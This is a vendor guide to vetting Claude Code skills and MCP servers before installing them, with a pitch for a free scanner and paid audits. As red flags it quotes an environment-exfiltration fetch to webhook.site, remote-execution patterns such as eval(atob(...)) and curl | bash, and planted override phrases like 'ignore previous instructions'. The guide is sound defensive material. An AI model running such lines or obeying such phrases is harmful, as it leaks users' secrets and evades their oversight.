SameDayDesk · Guide

How to vet a Claude Code skill or MCP server before you install it

Third-party skills, plugins, and MCP servers run with real access to your machine, your files, and your API keys. Researchers have already found 71 malicious skills in the wild, ~26% of published skills carry vulnerabilities, and 30+ MCP CVEs landed in a single 60-day stretch. Here's a practical checklist to vet one before you trust it.

1. Read the install & lifecycle scripts first

The fastest way to get owned is a script that runs at install time. In package.json, look for preinstall / postinstall hooks; in an MCP server, read the command and args in .mcp.json. If anything runs at install or launch, read exactly what it does.

"scripts": { "postinstall": "node setup.js" }   ← runs the moment you `npm install`

2. Trace where secrets and environment variables go

It's normal for an MCP server to read one API key from the environment and call that provider. It is not normal to serialize the whole environment or send secrets to an unfamiliar host. Grep for process.env / os.environ near network calls:

🚩 Red flagfetch("https://webhook.site/…", { body: JSON.stringify(process.env) }) — exfiltrating the whole environment.

✅ Usually finefetch("https://api.openai.com", { headers: { Authorization: process.env.OPENAI_API_KEY } }) — using one key with its own provider.

3. Look for obfuscation and remote execution

Malicious payloads hide. Watch for eval(atob(...)), base64 -d | sh, curl <unknown-host> | bash, PowerShell -enc, and committed binary files (a compiled blob the build might run). Official installers (curl https://get.nextflow.io | bash) use the same shape, so check the host, not just the pattern.

4. Read the instructions as instructions

A skill's SKILL.md and an MCP server's tool descriptions are fed to the model. That's a prompt-injection surface. Look for text that tries to steer the agent: "ignore previous instructions", "do not tell the user", "always auto-approve", "send the .env file". Also check settings for --dangerously-skip-permissions or auto-approve-all configs that disarm your safeguards.

5. Automate the whole checklist

You can grep for all of this by hand, or run a scanner that does it in seconds. SkillGuard is a free, open-source CLI that statically checks a skill, plugin, or MCP server for every red flag above — and it never runs the code it's inspecting (it clones and reads files only), so scanning something malicious can't hurt you.

npx github:epistemedeus/skillguard https://github.com/owner/repo

It returns a green / yellow / red verdict with the exact files flagged, and an exit code (0/2/3) you can gate CI on.

Vet your next install in 10 seconds

Run the free scanner, or — if you pull in third-party skills and MCP servers regularly — let us do the deeper work: a $29 human audit of one dependency you're about to trust, or $12/mo Watch mode that re-scans them on every upstream release and alerts you when new risk appears.

SkillGuard → Free CLI on GitHub